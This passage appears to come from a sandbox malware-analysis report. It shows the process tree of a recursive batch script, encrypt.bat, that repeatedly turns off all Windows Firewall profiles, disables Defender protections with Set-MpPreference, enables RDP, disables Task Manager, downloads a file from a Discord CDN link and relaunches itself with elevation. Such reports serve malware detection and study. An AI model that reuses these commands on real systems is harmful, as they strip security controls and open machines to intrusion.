C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵PID:1632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵PID:4380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵PID:3100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:4720
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:4844
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:1548
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵PID:5048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵PID:3116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵PID:4092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵PID:3800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵PID:2884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:732
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:1548
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:4844
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:856
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:3980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:3924
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵PID:4284
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵PID:4092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵PID:4264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵
- Modifies Windows Firewall
PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵PID:1492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Modifies registry class
PID:2600 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:3480
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:2220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:628
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:3300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:1036
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵PID:1212
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵PID:1676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵
- Modifies Windows Firewall
PID:4812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:2576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵PID:2928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:2884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:1188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵
- Modifies registry class
PID:4208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵PID:2688
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:3684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:4916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:1092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵PID:3328
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵PID:976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵PID:1948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵PID:4812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵PID:1912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:3484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵
- Modifies registry class
PID:2576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:3264
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:4516
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:5080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:3932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:3408
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵
- Modifies Windows Firewall
PID:2688
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵PID:4516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵PID:4312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵PID:3520
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵
- Modifies Windows Firewall
PID:3404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:3460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:5080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
PID:3472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵
- Modifies registry class
PID:1128 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:2752
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:3684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:3696
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:2060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:3472
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵PID:1548
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵PID:3076
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵PID:248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵PID:2748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:1084
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:1212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:3932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵PID:3364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:1528
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:3628
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:3576
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:1884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:3976
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵PID:4676
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵PID:4824
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵PID:1124
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵PID:1092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵PID:2100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵PID:3372
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:3960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵
- Modifies registry class
PID:4048 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:1912
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:236
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:1656
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:2372
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:2352
-
-
